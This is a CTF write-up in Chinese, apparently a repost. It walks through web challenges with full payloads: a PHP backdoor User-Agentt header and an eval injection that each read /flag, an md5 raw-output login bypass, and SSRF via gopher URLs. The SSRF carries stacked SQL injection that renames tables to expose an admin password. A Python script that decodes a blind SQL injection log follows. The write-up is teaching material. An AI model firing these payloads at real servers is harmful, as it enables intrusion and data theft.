文章目錄
- Web
- 簽到
- unsetme
- “慢慢做”管理系統
- Misc
- 你會日志分析嗎
- sectraffic
Web
簽到
http://cn-sec.com/archives/313267.html
User-Agentt: zerodiumsystem("cat /flag");
unsetme
這題先放著
/?a=:[]);eval($_GET[1]);//&1=system(%27cat%20/flag%27);
“慢慢做”管理系統
根據題目提示,這里第一步登錄應該利用一些字串被md5($string,true)之后會形成如下,從而造成注入
PS C:\Users\Administrator\Downloads> php -r "var_dump(md5('ffifdyop',true));"
Command line code:1:
string(16) "'or'6�]��!r,��b"
PS C:\Users\Administrator\Downloads>
但是遺憾的是這里的ffifdyop,被過濾了
所以我們需要尋找另一個能和ffifdyop達到同樣效果的字符,搜索引擎找一找
https://blog.csdn.net/March97/article/details/81222922
PS C:\Users\Administrator\Downloads> php -r "var_dump(md5('129581926211651571912466741651878684928',true));"
Command line code:1:
string(16) "�T0D��o#��'or'8"
PS C:\Users\Administrator\Downloads>
/?username=admin&password=129581926211651571912466741651878684928
成功登錄
根據題目的提示,直接在內網找一下admin.php
/ssrf.php?way=127.0.0.1%2Fadmin.php
抓一下這個后臺管理系統的包,然后整理一下這個127.0.0.1/admin.php的包,通過gopher協議發送POST資料過去看一下,用python簡單處理下
from urllib.parse import quote
payload = "username=mochu7&password=mochu7"
postdata = """
POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: {}
{}
""".format(len(payload),payload)
final_payload = 'gopher://127.0.0.1:80/_'+ quote(quote(postdata))
print(final_payload)
print(postdata)
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252031%250A%250Ausername%253Dmochu7%2526password%253Dmochu7%250A
成功發送,接下來測驗一下注入,加個單引號看看
username=mochu7'&password=mochu7
直接報錯了
很明顯這是注入,不過經過后面的fuzz測驗發現這里存在,而且這個回顯我看著就非常眼熟
username=mochu7';show databases#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252048%250A%250Ausername%253Dmochu7%2527%253Bshow%2520databases%2523%2526password%253Dmochu7%250A
Databases:
ctf
ctf2
information_schema
接著查
username=mochu7';use ctf;show tables#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252053%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf%253Bshow%2520tables%2523%2526password%253Dmochu7%250A
username=mochu7';use ctf2;show tables#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252054%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520tables%2523%2526password%253Dmochu7%250A
Tables_in_ctf:
users
Tables_in_ctf2:
fake_admin
real_admin_here_do_you_find
我們想要找的是真正的admin密碼
username=mochu7';use ctf2;show columns from `fake_admin`#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252073%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520columns%2520from%2520%2560fake_admin%2560%2523%2526password%253Dmochu7%250A
username=mochu7';use ctf2;show columns from `real_admin_here_do_you_find`#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252090%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520columns%2520from%2520%2560real_admin_here_do_you_find%2560%2523%2526password%253Dmochu7%250A
本來應該繼續查欄位內容得到real_admin_here_do_you_find表中的password欄位內容,但是這里過濾select、handler等,比賽的時候也就沒去研究怎么查詢到欄位資料了,因為這題很明顯像之前強網杯那題,我對那題有印象記得當時有一個通過修改想要查詢的表的表名(real_admin_here_do_you_find)為當前使用的表(fake_admin),然后構造一下注入得到當前表的資料的做法
username=mochu7';rename table fake_admin to mochu7;rename table real_admin_here_do_you_find to fake_admin#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%2520122%250A%250Ausername%253Dmochu7%2527%253Brename%2520table%2520fake_admin%2520to%2520mochu7%253Brename%2520table%2520real_admin_here_do_you_find%2520to%2520fake_admin%2523%2526password%253Dmochu7%250A
username=mochu7'or 1=1;show tables;#&password=mochu7
得到真正的admin密碼:5fb4e07de914cfc82afb44vbaf402203
最后傳入真正的admin賬戶名和密碼
username=admin&password=5fb4e07de914cfc82afb44vbaf402203
提示我們訪問/flag.php,并且查看原始碼拿著cookie去
Misc
你會日志分析嗎
時間盲注日志分析
發現每一位中的這些測驗包,都有一個包長度與其他的不一樣,那這一位應該就是正確的flag,直接用Python簡單處理下
from base64 import *
flag = ''
with open('access.log','r') as f:
lines = f.readlines()
for line in lines:
if "select%20flag%20from%20flllag" in line:
packet_len = line[line.find(' 200 ')+5:line.find(' "-" "python-requests/2.21.0"')]
if packet_len == '377':
ascii_code = line[line.find('))=')+3:line.find(',sleep')]
ascii_str = chr(int(ascii_code))
flag += ascii_str
else:
pass
else:
pass
print(b64decode(flag).decode('utf-8'))
flag{You_are_so_great}
sectraffic
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/272831.html
標籤:其他
上一篇:# 網路空間安全